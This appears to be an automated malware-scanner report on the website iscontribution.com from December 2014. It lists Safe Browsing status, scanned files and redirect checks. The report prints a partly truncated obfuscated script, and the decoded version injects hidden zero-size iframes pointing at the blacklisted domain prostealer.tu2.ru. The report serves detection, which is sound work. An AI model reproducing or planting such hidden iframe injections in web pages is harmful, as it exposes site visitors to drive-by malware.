Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iscontribution.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iscontribution.com/ | 200 OK Content-Length: 12637 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.prostealer.tu2.ru var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41 ...[4387 bytes skipped]... Decoded script: var Str="index.php' width='0' height='0'></iframe> <iframe src='http://www.prostealer.tu2.ru/" document.write(Str.substring(42,85),Str.substring(0,42)) | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://iscontribution.com/js/jquery.scrollTo-1.3.3.js | 200 OK Content-Length: 6354 Content-Type: application/javascript | clean |
http://iscontribution.com/js/jquery.localscroll-1.2.5.js | 200 OK Content-Length: 4253 Content-Type: application/javascript | clean |
http://iscontribution.com/js/jquery.serialScroll-1.2.1.js | 200 OK Content-Length: 6976 Content-Type: application/javascript | clean |
http://iscontribution.com/js/coda-slider.js | 200 OK Content-Length: 3571 Content-Type: application/javascript | clean |
http://iscontribution.com/js/custom.js | 200 OK Content-Length: 520 Content-Type: application/javascript | clean |
http://iscontribution.com/js/jquery.easing.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://iscontribution.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://iscontribution.com/js/jquery.fancybox-1.2.1.pack.js | 200 OK Content-Length: 8303 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iscontribution.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 12:16:35 GMT
Accept-Ranges: bytes
ETag: "27ae850-315d-47801358435c0"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 12637
Content-Type: text/html
Last-Modified: Tue, 10 Nov 2009 09:48:15 GMT
...12637 bytes of data.
GET / HTTP/1.1
Host: iscontribution.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 12:16:35 GMT
Accept-Ranges: bytes
ETag: "27ae850-315d-47801358435c0"
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 12637
Content-Type: text/html
Last-Modified: Tue, 10 Nov 2009 09:48:15 GMT
...12637 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iscontribution.com
Referer: http://www.google.com/search?q=iscontribution.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iscontribution.com
Referer: http://www.google.com/search?q=iscontribution.com
Result:
The result is similar to the first query. There are no suspicious redirects found.